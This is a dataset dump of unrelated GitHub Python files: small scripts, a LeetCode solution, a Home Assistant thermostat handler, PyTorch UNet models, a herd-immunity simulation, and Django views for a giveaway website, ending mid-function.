filename):\r\n \"\"\"\r\n filename is a string\r\n transforms KMLfolder into a KML file\r\n and writes it with namef: filename\r\n \"\"\"\r\n\r\n\r\n# Enter main program\r\n# Set files to read and write\r\nfiletoread = input(\"Insert filename to read\")\r\nfiletoread = filetoread+\".xlsx\"\r\nfiletowrite = filetoread\r\n\r\ndata = exceltodict(filetoread, \"Hoja1\")\r\n\r\n# Print log of exported data\r\nprint(\"Generate points:\")\r\nfor key in data.keys():\r\n print(key, \":\", data[key])\r\n\r\nfolder = dicttoKMLfolder(data)\r\nKMLfldtofile(folder, filetowrite)\r\n\r\n# Messages to end program\r\nprint(\"KML wrote with name\", filetowrite)\r\ninput(\"Press key to end\")\r\n","repo_name":"alejjjano/ExcelEdit","sub_path":"XLS to KML.py","file_name":"XLS to KML.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"74519601459","text":"from datetime import datetime\nimport re\n#Создаем файл и записываем в него текущую дату:\nf = open('today.txt', 'w')\nnow = datetime.now()\nf.write(str(now))\nf.close()\n# Cчитываем строку и ищем в ней соответствие по шаблону:\nwith open('today.txt', 'r') as f:\n today_string = f.readline()\nmatch = re.findall(r'-(.*)-', today_string)\nprint(match)\n\n","repo_name":"itamitut/MyPython","sub_path":"DateTime.py","file_name":"DateTime.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"37060144871","text":"class UndergroundSystem:\n\n def __init__(self):\n self.customers_time = dict()\n self.customers_station = dict()\n self.total_time = dict()\n self.count = dict()\n\n def checkIn(self, id: int, stationName: str, t: int) -> None:\n self.customers_time[id] = t\n self.customers_station[id] = stationName\n \n def checkOut(self, id: int, stationName: str, t: int) -> None:\n station = self.customers_station[id]\n time = self.customers_time[id]\n if (station + stationName) in self.total_time:\n self.total_time[station + stationName] += t - time\n self.count[station + stationName] += 1\n else:\n self.total_time[station + stationName] = t - time\n self.count[station + stationName] = 1\n\n def getAverageTime(self, startStation: str, endStation: str) -> float:\n station = startStation + endStation\n return self.total_time[station] / self.count[station]\n\n\n# Your UndergroundSystem object will be instantiated and called as such:\n# obj = UndergroundSystem()\n# obj.checkIn(id,stationName,t)\n# obj.checkOut(id,stationName,t)\n# param_3 = obj.getAverageTime(startStation,endStation)\n","repo_name":"nilax97/leetcode-solutions","sub_path":"solutions/Design Underground System/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"34905110625","text":"import logging\n\nfrom ..controlling import control_trv\nfrom homeassistant.core import callback\n\n_LOGGER = logging.getLogger(__name__)\n\n@callback\nasync def trigger_time(self, current_time):\n \"\"\"\n Triggered by night mode timer.\n @param current_time:\n \"\"\"\n \n _is_night = _nighttime(current_time)\n \n if _is_night is None:\n _LOGGER.error(\"better_thermostat %s: Error while checking if it is night\", self.name)\n return\n elif _is_night:\n _LOGGER.debug(\"better_thermostat %s: Night mode activated\", self.name)\n self.last_daytime_temp = self._target_temp\n self._target_temp = self.night_temp\n self.night_mode_active = True\n \n else:\n _LOGGER.debug(\"ai_thermostat %s: Day mode activated\", self.name)\n if self.last_daytime_temp is None:\n _LOGGER.error(\"better_thermostat %s: Could not load last daytime temp; continue using the current setpoint\", self.name)\n else:\n self._target_temp = self.last_daytime_temp\n self.night_mode_active = False\n \n self.async_write_ha_state()\n await control_trv(self)\n\n@callback\ndef _nighttime(self, current_time):\n \"\"\"\n Return whether it is nighttime.\n @param current_time: time.time()\n @return: bool True if it is nighttime; None if not configured\n \"\"\"\n _return_value = None\n \n # one or more of the inputs is None or empty\n if not all([self.night_start, self.night_end, current_time]):\n return _return_value\n \n # fetch to instance variables, since we might want to swap them\n start_time, end_time = self.night_start, self.night_end\n \n # if later set to true we'll swap the variables and output boolean, 'cause we use the logic backwards\n # if the nighttime passes not over midnight, like (01:00 to 05:00) we use the inverted logic\n # while something like 23:00 to 05:00 would use the default\n _reverse = False\n \n if start_time.hour < end_time.hour or (start_time.hour == end_time.hour and start_time.minute < end_time.minute):\n # not passing midnight, so we use the inverted logic\n _reverse = True\n start_time, end_time = end_time, start_time\n \n # if we are after the start time, but before the end time, we are in the night\n if (current_time.hour > start_time.hour or (\n current_time.hour == start_time.hour and current_time.minute >= start_time.minute)) and current_time.hour < end_time.hour or (\n current_time.hour == end_time.hour and current_time.minute < end_time.minute):\n _return_value = True\n \n # flip output, since we flipped the start/end time\n if _reverse:\n return not _return_value\n return _return_value","repo_name":"sensei73/better_thermostat","sub_path":"custom_components/better_thermostat/events/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"57"} +{"seq_id":"4675538846","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass EncDecModel(nn.Module):\n \"\"\"\n Basic encoder decoder NN\n \"\"\"\n\n def __init__(self, in_channels, out_channels, conv_channels=64):\n super().__init__()\n\n # encoder (downsampling)\n self.enc_conv0 = nn.Conv2d(in_channels, conv_channels, 3, padding=1)\n self.pool0 = nn.MaxPool2d(2, 2) # 128 -> 64\n self.enc_conv1 = nn.Conv2d(conv_channels, conv_channels, 3, padding=1)\n self.pool1 = nn.MaxPool2d(2, 2) # 64 -> 32\n self.enc_conv2 = nn.Conv2d(conv_channels, conv_channels, 3, padding=1)\n self.pool2 = nn.MaxPool2d(2, 2) # 32 -> 16\n self.enc_conv3 = nn.Conv2d(conv_channels, conv_channels, 3, padding=1)\n self.pool3 = nn.MaxPool2d(2, 2) # 16 -> 8\n\n # bottleneck\n self.bottleneck_conv = nn.Conv2d(conv_channels, conv_channels, 3, padding=1)\n\n # decoder (upsampling)\n self.upsample0 = nn.Upsample(16) # 8 -> 16\n self.dec_conv0 = nn.Conv2d(conv_channels, conv_channels, 3, padding=1)\n self.upsample1 = nn.Upsample(32) # 16 -> 32\n self.dec_conv1 = nn.Conv2d(conv_channels, conv_channels, 3, padding=1)\n self.upsample2 = nn.Upsample(64) # 32 -> 64\n self.dec_conv2 = nn.Conv2d(conv_channels, conv_channels, 3, padding=1)\n self.upsample3 = nn.Upsample(128) # 64 -> 128\n self.dec_conv3 = nn.Conv2d(conv_channels, out_channels, 3, padding=1)\n\n def forward(self, x):\n # encoder\n e0 = self.pool0(F.relu(self.enc_conv0(x)))\n e1 = self.pool1(F.relu(self.enc_conv1(e0)))\n e2 = self.pool2(F.relu(self.enc_conv2(e1)))\n e3 = self.pool3(F.relu(self.enc_conv3(e2)))\n\n # bottleneck\n b = F.relu(self.bottleneck_conv(e3))\n\n # decoder\n d0 = F.relu(self.dec_conv0(self.upsample0(b)))\n d1 = F.relu(self.dec_conv1(self.upsample1(d0)))\n d2 = F.relu(self.dec_conv2(self.upsample2(d1)))\n d3 = self.dec_conv3(self.upsample3(d2)) # no activation\n return d3\n\n\nclass UNet(nn.Module):\n def __init__(self):\n super().__init__()\n\n # encoder (downsampling)\n self.enc_conv0 = nn.Sequential(\n nn.Conv2d(3, 64, 3, padding=1),\n nn.BatchNorm2d(64),\n nn.LeakyReLU(),\n nn.Conv2d(64, 64, 3, padding=1),\n nn.BatchNorm2d(64),\n nn.LeakyReLU(),\n )\n self.pool0 = nn.MaxPool2d(2, stride=2)\n\n self.enc_conv1 = nn.Sequential(\n nn.Conv2d(64, 128, 3, padding=1),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(),\n nn.Conv2d(128, 128, 3, padding=1),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(),\n )\n self.pool1 = nn.MaxPool2d(2, stride=2)\n\n self.enc_conv2 = nn.Sequential(\n nn.Conv2d(128, 256, 3, padding=1),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(),\n nn.Conv2d(256, 256, 3, padding=1),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(),\n )\n self.pool2 = nn.MaxPool2d(2, stride=2)\n\n self.enc_conv3 = nn.Sequential(\n nn.Conv2d(256, 512, 3, padding=1),\n nn.BatchNorm2d(512),\n nn.LeakyReLU(),\n nn.Conv2d(512, 512, 3, padding=1),\n nn.BatchNorm2d(512),\n nn.LeakyReLU(),\n )\n self.pool3 = nn.MaxPool2d(2, stride=2)\n\n # bottleneck\n self.bottleneck_conv = nn.Sequential(\n nn.Conv2d(512, 1024, 3, padding=1),\n nn.BatchNorm2d(1024),\n nn.LeakyReLU(),\n nn.Conv2d(1024, 1024, 3, padding=1),\n nn.BatchNorm2d(1024),\n nn.LeakyReLU(),\n )\n\n # decoder (upsampling)\n self.upconv3 = nn.ConvTranspose2d(1024, 512, 2, stride=2)\n self.dec_conv3 = nn.Sequential(\n nn.Conv2d(1024, 512, 3, padding=1),\n nn.BatchNorm2d(512),\n nn.LeakyReLU(),\n nn.Conv2d(512, 512, 3, padding=1),\n nn.BatchNorm2d(512),\n nn.LeakyReLU(),\n )\n\n self.upconv2 = nn.ConvTranspose2d(512, 256, 2, stride=2)\n self.dec_conv2 = nn.Sequential(\n nn.Conv2d(512, 256, 3, padding=1),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(),\n nn.Conv2d(256, 256, 3, padding=1),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(),\n )\n\n self.upconv1 = nn.ConvTranspose2d(256, 128, 2, stride=2)\n self.dec_conv1 = nn.Sequential(\n nn.Conv2d(256, 128, 3, padding=1),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(),\n nn.Conv2d(128, 128, 3, padding=1),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(),\n )\n\n self.upconv0 = nn.ConvTranspose2d(128, 64, 2, stride=2)\n self.dec_conv0 = nn.Sequential(\n nn.Conv2d(128, 64, 3, padding=1),\n nn.BatchNorm2d(64),\n nn.LeakyReLU(),\n nn.Conv2d(64, 64, 3, padding=1),\n nn.BatchNorm2d(64),\n nn.LeakyReLU(),\n )\n\n self.final_conv = nn.Conv2d(64, 1, 1)\n\n def forward(self, x):\n # encoder\n e0 = self.enc_conv0(x)\n e1 = self.enc_conv1(self.pool0(e0))\n e2 = self.enc_conv2(self.pool1(e1))\n e3 = self.enc_conv3(self.pool2(e2))\n\n # bottleneck\n b = self.bottleneck_conv(self.pool3(e3))\n\n # decoder\n d3 = self.dec_conv3(torch.cat([self.upconv3(b), e3], 1))\n d2 = self.dec_conv2(torch.cat([self.upconv2(d3), e2], 1))\n d1 = self.dec_conv1(torch.cat([self.upconv1(d2), e1], 1))\n d0 = self.dec_conv0(torch.cat([self.upconv0(d1), e0], 1))\n\n return torch.sigmoid(self.final_conv(d0))\n\n\nclass UnetBlock(nn.Module):\n \"\"\"\n UNet block\n It can be used to sequrntially build a larger UNet from the bottom up.\n \"\"\"\n\n def __init__(\n self,\n in_channels,\n mid_channels,\n out_channels=None,\n layers=1,\n sub_network=None,\n filter_size=3,\n unet_block=\"cnn\",\n ):\n super().__init__()\n\n # Define which type the encoder/decoder block come from\n\n block = self.cnn_layer\n if unet_block.lower().strip() == \"resnet\":\n block = self.resnet_layer\n\n # Encoder layers\n in_layers = [block(in_channels, mid_channels, filter_size)]\n\n # Set the multiplier for the concatenation cnn's of the decoder\n if sub_network is None:\n inputs_to_outputs = 1\n else:\n inputs_to_outputs = 2\n\n # Decoder layers\n out_layers = [\n block(mid_channels * inputs_to_outputs, mid_channels, filter_size)\n ]\n\n # Sequentially build up the encoder and decoder networks\n for _ in range(layers - 1):\n in_layers.append(block(mid_channels, mid_channels, filter_size))\n out_layers.append(block(mid_channels, mid_channels, filter_size))\n\n # Convolution to preserve size of image\n if out_channels is not None:\n out_layers.append(nn.Conv2d(mid_channels, out_channels, 1, padding=0))\n\n # Unpack the encoder layers in a Sequential module for forward\n self.in_model = nn.Sequential(*in_layers)\n\n # Create a bottleneck layer ( from the subnetworks (if they exist) or a simple conv2d that preserves size and channels\n if sub_network is not None:\n self.bottleneck = nn.Sequential(\n # Downscale\n nn.Conv2d(\n mid_channels,\n mid_channels,\n filter_size,\n padding=filter_size // 2,\n stride=2,\n ),\n sub_network,\n # Upscale\n nn.ConvTranspose2d(\n mid_channels,\n mid_channels,\n filter_size,\n padding=filter_size // 2,\n output_padding=1,\n stride=2,\n ),\n )\n else:\n self.bottleneck = None\n\n self.out_model = nn.Sequential(*out_layers)\n\n def forward(self, x):\n full_scale_result = self.in_model(x)\n\n if self.bottleneck is not None:\n bottle_result = self.bottleneck(full_scale_result)\n full_scale_result = torch.cat([full_scale_result, bottle_result], dim=1)\n\n return self.out_model(full_scale_result)\n\n def cnn_layer(self, in_channels, out_channels, kernel_size=3, bn=True):\n padding = kernel_size // 2 # To preserve img dimensions. Equal to int((k-1)/2)\n cnn_bias = False if bn else True # Fewer parameters to save\n return nn.Sequential(\n nn.Conv2d(\n in_channels, out_channels, kernel_size, padding=padding, bias=cnn_bias\n ),\n nn.BatchNorm2d(out_channels) if bn else nn.Identity(),\n nn.LeakyReLU(),\n )\n\n def resnet_layer(self, in_channels, out_channels, kernel_size=3, bn=True):\n padding = kernel_size // 2 # To preserve img dimensions. Equal to int((k-1)/2)\n bias = False if bn else True # Fewer parameters to save\n layers = []\n layers.append(\n nn.Conv2d(\n in_channels, out_channels, kernel_size, padding=padding, bias=bias\n )\n )\n if bn:\n layers.append(nn.BatchNorm2d(out_channels))\n layers.append(nn.LeakyReLU())\n layers.append(\n nn.Conv2d(\n out_channels, out_channels, kernel_size, padding=padding, bias=bias\n )\n )\n if bn:\n layers.append(nn.BatchNorm2d(out_channels))\n\n block = nn.Sequential(*layers)\n\n if in_channels == out_channels:\n identity = nn.Identity()\n else:\n identity = nn.Conv2d(in_channels, out_channels, kernel_size=1)\n\n return ResidualBlock(block, identity)\n\n\nclass ResidualBlock(nn.Module):\n def __init__(self, block, shortcut):\n super().__init__()\n self.block = block\n self.shortcut = shortcut\n\n def forward(self, x):\n return F.leaky_relu(self.block(x) + self.shortcut(x))\n\n\nclass UNetBlocked(nn.Module):\n \"\"\"\n Creates a UNet from UnetBlock blocks\n \"\"\"\n\n def __init__(self, in_channels, out_channels, unet_block=\"cnn\"):\n \"\"\"\n in_channels: input image channels, usually 3 for rgb or 1 for grayscale\n out_channels: 1 for 1 class segmentation (0,1) or n for n classes\n \"\"\"\n super().__init__()\n\n layers_per_building_block = 2\n\n # Create UNet from UNetBlock 's based on the constructor arguments\n self.unet_model = nn.Sequential(\n UnetBlock(\n in_channels,\n 32,\n layers=layers_per_building_block,\n unet_block=unet_block,\n sub_network=UnetBlock(\n 32,\n 64,\n out_channels=32,\n layers=layers_per_building_block,\n unet_block=unet_block,\n sub_network=UnetBlock(\n 64,\n 128,\n out_channels=64,\n layers=layers_per_building_block,\n unet_block=unet_block,\n sub_network=UnetBlock(\n 128,\n 256,\n out_channels=128,\n layers=layers_per_building_block,\n unet_block=unet_block,\n sub_network=None,\n ),\n ),\n ),\n ),\n nn.Conv2d(32, out_channels, 3, padding=1),\n )\n\n def forward(self, x):\n x = self.unet_model(x)\n return x\n","repo_name":"lefteriskat/Image_Segmentation_Project","sub_path":"src/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"69932852340","text":"import json\nfrom random import randint, getrandbits\nfrom faker import Faker\n\nfake = Faker()\n\ndataset = []\n\nwith open(\"Datasets/services.json\", \"r\") as file:\n services = json.loads(file.read())\n\nwith open(\"Datasets/resorts.json\", \"r\") as file:\n resorts = json.loads(file.read())\n\nwith open(\"Datasets/suitablefor.json\", \"r\") as file:\n suitablefor = json.loads(file.read())\n\nnum = 1\nfor provider in range(1, 249):\n\n rand_services = []\n for i in range(randint(1, 10)):\n service = randint(1, len(services))\n if service not in rand_services:\n rand_services.append(service)\n\n rand_resorts = []\n for i in range(randint(1, 5)):\n resort = randint(1, len(resorts))\n if resort not in rand_resorts:\n rand_resorts.append(resort)\n\n rand_suitablefor = []\n for i in range(randint(1, 5)):\n _suitablefor = randint(1, len(suitablefor))\n if _suitablefor not in rand_suitablefor:\n rand_suitablefor.append(_suitablefor)\n\n if bool(getrandbits(1)):\n dataset.append({\n \"model\": \"db.provider\",\n \"pk\": num,\n \"fields\": {\n \"user_id\": provider,\n \"provider_bio\": fake.sentence(),\n \"services\": rand_services,\n \"suitable_for\": rand_suitablefor,\n \"resorts\": rand_resorts,\n }\n })\n\n num += 1\n\nwith open(\"Datasets/providers.json\", 'w') as file:\n file.write(json.dumps(dataset))\n","repo_name":"Magni0/Datasets","sub_path":"SeedScripts/seed_provider.py","file_name":"seed_provider.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"74747860977","text":"import random, sys\nrandom.seed(42)\nfrom person import Person\nfrom logger import Logger\nfrom virus import Virus\n\n\nclass Simulation(object):\n ''' Main class that will run the herd immunity simulation program.\n Expects initialization parameters passed as command line arguments when file is run.\n\n Simulates the spread of a virus through a given population. The percentage of the\n population that are vaccinated, the size of the population, and the amount of initially\n infected people in a population are all variables that can be set when the program is run.\n '''\n def __init__(self, pop_size, vacc_percentage, virus, mortality_rate, initial_infected=1):\n ''' Logger object logger records all events during the simulation.\n Population represents all Persons in the population.\n The next_person_id is the next available id for all created Persons,\n and should have a unique _id value.\n The vaccination percentage represents the total percentage of population\n vaccinated at the start of the simulation.\n You will need to keep track of the number of people currently infected with the disease.\n The total infected people is the running total that have been infected since the\n simulation began, including the currently infected people who died.\n You will also need to keep track of the number of people that have die as a result\n of the infection.\n\n All arguments will be passed as command-line arguments when the file is run.\n HINT: Look in the if __name__ == \"__main__\" function at the bottom.\n '''\n \n \n self.pop_size = pop_size # Int\n self.initial_infected = initial_infected # Int\n self.next_person_id = 0 # Int\n self.virus = virus # Virus object\n self.total_infected = 0 # Int\n self.vacc_percentage = vacc_percentage # float between 0 and 1\n self.total_dead = 0 # Int\n file_name = \"{}_simulation_pop_{}_vp_{}_infected_{}.txt\".format(\n virus_name, pop_size, vacc_percentage, initial_infected)\n self.logger = Logger(file_name)\n self.newly_infected = []\n self.mortality_rate = mortality_rate\n self.population = self._create_population() # List of Person objects\n\n def _create_population(self):\n '''This method will create the initial population.\n Args:\n initial_infected (int): The number of infected people that the simulation\n will begin with.\n\n Returns:\n list: A list of Person objects.\n\n '''\n \n \n population = []\n for uid in range(self.pop_size):\n # If we don't have enough infected people, set person to be infected\n if self.total_infected < self.initial_infected:\n population.append(Person(uid, False, self.virus))\n self.total_infected += 1\n # They are not infected\n else:\n # Randomly choose where or not they are vaccinated\n vaccinated = random.random() > self.vacc_percentage\n population.append(Person(uid, vaccinated, None))\n \n return population\n\n \n\n\n\n \n \n\n def _simulation_should_continue(self):\n ''' The simulation should only end if the entire population is dead\n or everyone is vaccinated.\n\n Returns:\n bool: True for simulation should continue, False if it should end.\n '''\n\n ##TIMO wrote this\n everyones_dead = True\n everyones_vaccinated = True\n noones_infected = True\n for person in self.population:\n if person.is_alive:\n everyones_dead = False\n if not person.is_vaccinated:\n everyones_vaccinated = False\n if person.infection != None:\n noones_infected = False\n\n return not (everyones_vaccinated or everyones_dead or noones_infected)\n \n\n\n def run(self):\n ''' This method should run the simulation until all requirements for ending\n the simulation are met.\n '''\n #peer programmed\n self.logger.write_metadata(self.pop_size, self.vacc_percentage, self.virus.name, self.mortality_rate, self.virus.repro_rate)\n time_step_counter = 1\n\n while self._simulation_should_continue():\n newly_infected, newly_killed = self.time_step()\n total_infected = len([p for p in self.population if p.infection is not None and p.is_alive])\n total_dead = len([p for p in self.population if not p.is_alive])\n self.logger.log_time_step(time_step_counter, newly_infected, newly_killed, total_infected, total_dead)\n time_step_counter += 1\n # round of this simulation.\n print('The simulation has ended after {} turns.'.format(time_step_counter))\n\n def time_step(self):\n ''' This method should contain all the logic for computing one time step\n in the simulation.\n\n This includes:\n 1. 100 total interactions with a randon person for each infected person\n in the population\n 2. If the person is dead, grab another random person from the population.\n Since we don't interact with dead people, this does not count as an interaction.\n 3. Otherwise call simulation.interaction(person, random_person) and\n increment interaction counter by 1.\n '''\n ##Connor Wrote this \n alive_people = [p for p in self.population if p.is_alive]\n infected_people = [p for p in alive_people if p.infection != None]\n newly_infected = 0\n for infectedPerson in infected_people:\n for _ in range(100):\n randomPerson = random.choice(alive_people)\n got_infected = self.interaction(infectedPerson, randomPerson)\n newly_infected += 1 if got_infected else 0\n newly_killed = 0\n for person in infected_people:\n did_die = not person.did_survive_infection(self.mortality_rate)\n newly_killed += 1 if did_die else 0\n self.logger.log_infection_survival(person, did_die)\n \n return newly_infected, newly_killed\n\n def interaction(self, person, random_person):\n '''This method should be called any time two living people are selected for an\n interaction. It assumes that only living people are passed in as parameters.\n\n Args:\n person1 (person): The initial infected person\n random_person (person): The person that person1 interacts with.\n '''\n ##connor wrote this\n assert person.is_alive == True\n assert random_person.is_alive == True\n\n if random_person.is_vaccinated:\n self.logger.log_interaction(person, random_person, False, True, False)\n elif random_person.infection is None:\n if random.random() <= self.virus.repro_rate:\n random_person.infection = person.infection\n self.logger.log_interaction(person, random_person, False, False, True)\n return True\n else:\n random_person.is_vaccinated = True\n self.logger.log_interaction(person, random_person, False, False, False)\n elif random_person.infection != None:\n self.logger.log_interaction(person, random_person, True, False, False)\n return False\n\n \n \n\n def _infect_newly_infected(self):\n ''' This method should iterate through the list of ._id stored in self.newly_infected\n and update each Person object with the disease. '''\n #CONNOR wrote this\n if len(self.newly_infected) > 0:\n for person in self.newly_infected:\n person.infection = self.virus\n \n self.total_infected += 1\n\n self.newly_infected = []\n\n\n\nif __name__ == \"__main__\":\n params = sys.argv[1:]\n virus_name = str(params[0])\n repro_num = float(params[1])\n mortality_rate = float(params[2])\n\n pop_size = int(params[3])\n vacc_percentage = float(params[4])\n\n\n if len(params) == 6:\n initial_infected = int(params[5])\n else:\n initial_infected = 1\n\n virus = Virus(virus_name, repro_num, mortality_rate)\n sim = Simulation(pop_size, vacc_percentage, virus, mortality_rate, initial_infected)\n\n sim.run()\n \n","repo_name":"Connor-Cahill/herd","sub_path":"simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":8500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"39968917264","text":"from django.shortcuts import get_object_or_404, redirect, render\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import login,logout,authenticate\nfrom django.utils import timezone\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import SignupForm,ContactUsForm,Profileform,SendEmailForm,GiveawayForm,TransactionForm\nfrom .models import Profile,Give,Transaction,Charge,Response,OnDeliveryTransaction,State,DestinationCharge,GiveawayCap,ShoppingCart\nfrom django.http import HttpResponse\nfrom django.contrib import messages\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.core.mail import send_mail,BadHeaderError\nfrom django.conf import settings\nfrom django.contrib.auth.forms import PasswordResetForm\nfrom django.db.models.query_utils import Q\nfrom django.utils.http import urlsafe_base64_encode,urlsafe_base64_decode\nfrom django.contrib.auth.tokens import default_token_generator\nfrom django.utils.encoding import force_bytes\nfrom django.core.mail import EmailMultiAlternatives\nfrom django import template\nfrom django.contrib.auth import get_user_model\nimport requests\nfrom datetime import timedelta\nfrom .fields import final_checkout\nfrom itertools import chain\n\n\n\nUserModel = get_user_model()\n\n\n\ndef home(request):\n user=request.user\n electronics=Give.objects.filter(gift_status='unpicked',category='electronics').order_by('-date_posted')[:12]\n natives=Give.objects.filter(gift_status='unpicked',category='natives').order_by('-date_posted')[:12]\n shoes=Give.objects.filter(gift_status='unpicked',category='shoes').order_by('-date_posted')[:12]\n clothes=Give.objects.filter(gift_status='unpicked',category='clothes').order_by('-date_posted')[:12]\n corporate=Give.objects.filter(gift_status='unpicked',category='corporate').order_by('-date_posted')[:12]\n cartItem=Give.objects.filter(gift_recipient=user, gift_status='requested').count\n premium=Give.objects.filter(product_class='premium',gift_status='unpicked').order_by('-date_posted')[:12]\n context={\n 'premium':premium,\n 'cartItem':cartItem,\n 'electronics':electronics,\n 'natives':natives,\n 'shoes':shoes,\n 'clothes':clothes,\n 'corporate':corporate\n }\n return render(request,'givers/new_home.html',context)\n\n\ndef operation(request):\n return render(request,'givers/howitworks.html')\n\ndef policy(request):\n return render(request,'givers/policy.html')\n\ndef about(request):\n return render(request,'givers/about.html')\n\n\ndef reply_contact(request):\n\n shape=request.session.get('selected')\n\n if request.method=='POST':\n form=SendEmailForm(request.POST)\n if form.is_valid:\n new_form=form.save(commit=False)\n new_form.email=shape[0]\n new_form.replied_by=request.user.username\n new_form.comment=form.cleaned_data.get('comment')\n new_form.save()\n\n if len(shape)>1:\n comment=form.cleaned_data.get('comment')\n for i in shape[1:]:\n data={\n 'email':i,\n 'comment':comment,\n 'replied_by':request.user.username\n }\n Response.objects.create(**data)\n\n msg=EmailMultiAlternatives('Giveawaynow',form.cleaned_data.get('comment'),settings.EMAIL_HOST_USER,bcc=shape)\n msg.send()\n messages.success(request,'reply sent')\n del request.session['selected']\n return redirect('/admin/givers/contactus')\n\n\n\n\ndef signupuser(request):\n\n if request.method == 'POST':\n form = SignupForm()\n state=request.POST['state']\n username = request.POST['username']\n email = request.POST['email']\n password1 = request.POST['password1']\n password2 = request.POST['password2']\n if password1 == password2:\n if User.objects.filter(username=username).exists():\n messages.error(request,'Username Already Taken')\n return redirect('signupuser')\n\n elif User.objects.filter(email=email).exists():\n messages.error(request,'Email Already Exist')\n return redirect('signupuser')\n\n else:\n form = SignupForm(request.POST)\n if form.is_valid():\n user = form.save()\n user.refresh_from_db()\n user.first_name=form.cleaned_data.get('firstname')\n user.last_name=form.cleaned_data.get('lastname')\n user.profile.state=form.cleaned_data.get('state')\n user.profile.firstname=form.cleaned_data.get('firstname')\n user.profile.lastname=form.cleaned_data.get('lastname')\n user.profile.email=form.cleaned_data.get('email')\n user.profile.phone_number= form.cleaned_data.get('phone_number')\n if not len(str(user.profile.phone_number)) == 10:\n messages.error(request,'invalid phone number')\n return redirect('signupuser')\n user.save()\n\n subject = 'Activate your account.'\n plaintext = template.loader.get_template('password/acc_activate_email.txt')\n htmltemp = template.loader.get_template('password/acc_activate_email.html')\n c = {\n\t\t\t\t\t\"email\":user.profile.email,\n\t\t\t\t\t'domain':'www.giveawaynow.com.ng',\n\t\t\t\t\t'site_name': 'Giveawaynow',\n\t\t\t\t\t\"uid\": urlsafe_base64_encode(force_bytes(user.pk)),\n\t\t\t\t\t\"user\": user,\n\t\t\t\t\t'token': default_token_generator.make_token(user),\n\t\t\t\t\t'protocol': 'https',\n\t\t\t\t\t}\n text_content = plaintext.render(c)\n html_content = htmltemp.render(c)\n try:\n msg = EmailMultiAlternatives(subject, text_content,settings.EMAIL_HOST_USER, [user.profile.email], headers = {'Reply-To': settings.EMAIL_HOST_USER})\n msg.attach_alternative(html_content, \"text/html\")\n msg.send()\n except BadHeaderError:\n return HttpResponse('Invalid header found.')\n messages.info(request, \"A verification mail has been sent to your email, kindly complete registration from there. \")\n return redirect (\"home\")\n '''username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password1')\n user= authenticate(username=username,password=password)\n login(request,user)\n return redirect('account_update')'''\n else:\n form = SignupForm()\n messages.error(request,'form is invalid')\n return redirect('signupuser')\n\n else:\n messages.error(request,'Password does not match')\n return redirect('signupuser')\n\n else:\n form = SignupForm()\n return render(request, 'givers/signupuser.html',{'form':form})\n\n\ndef contact(request):\n\n if request.method=='POST':\n form = ContactUsForm(request.POST)\n if form.is_valid():\n form.save()\n email=form.cleaned_data.get('email')\n subject = \"Giveawaynow\"\n plaintext = template.loader.get_template('password/contact_response.txt')\n htmltemp = template.loader.get_template('password/contact_response.html')\n c={\n 'subject':form.cleaned_data.get('subject')\n }\n text_content = plaintext.render(c)\n html_content = htmltemp.render(c)\n msg = EmailMultiAlternatives(subject, text_content, settings.EMAIL_HOST_USER, [email], headers = {'Reply-To': email})\n msg.attach_alternative(html_content, \"text/html\")\n msg.send()\n messages.success(request,'Thanks, we will treat as urgent')\n return redirect('contact')\n else:\n form=ContactUsForm()\n return render(request,'givers/contact.html',{'form':form})\n\n\ndef product_class(request):\n product=Give.objects.filter(product_class='premium',gift_status='unpicked')\n title='Hottest Deals'\n p=Paginator(product,20)\n page_number=request.GET.get('page')\n try:\n page_obj=p.get_page(page_number)\n except PageNotAnInteger:\n page_obj=p.page(1)\n except EmptyPage:\n page_obj=p.page(p.num_pages)\n\n return render(request,'givers/productCart.html',{'page_obj':page_obj,'title':title})\n\n\ndef product_category(request,category):\n product=Give.objects.filter(category=category,gift_status='unpicked').order_by('-date_posted')\n if category=='shoes':\n title='Footwear'\n elif category=='corporate':\n title='Corporate Wears'\n elif category=='natives':\n title='Native wears'\n else:\n title=category\n\n p=Paginator(product,20)\n page_number=request.GET.get('page')\n try:\n page_obj=p.get_page(page_number)\n except PageNotAnInteger:\n page_obj=p.page(1)\n except EmptyPage:\n page_obj=p.page(p.num_pages)\n\n return render(request,'givers/productCart.html',{'page_obj':page_obj,'title':title})\n\n\n@login_required(login_url='/login/')\ndef user_account(request):\n user = request.user\n if user.profile.state=='lagos':\n fit=True\n else:\n fit=False\n\n online_payment= Transaction.objects.filter(made_by=str(user),verified=True)\n ondelivery_payment=OnDeliveryTransaction.objects.filter(made_by=str(user))\n orders=sorted(chain(online_payment,ondelivery_payment),key=lambda order: order.made_on, reverse=True)\n picks= Give.objects.filter(Q(gift_recipient=user.profile.email) & Q(gift_status='requested'))\n 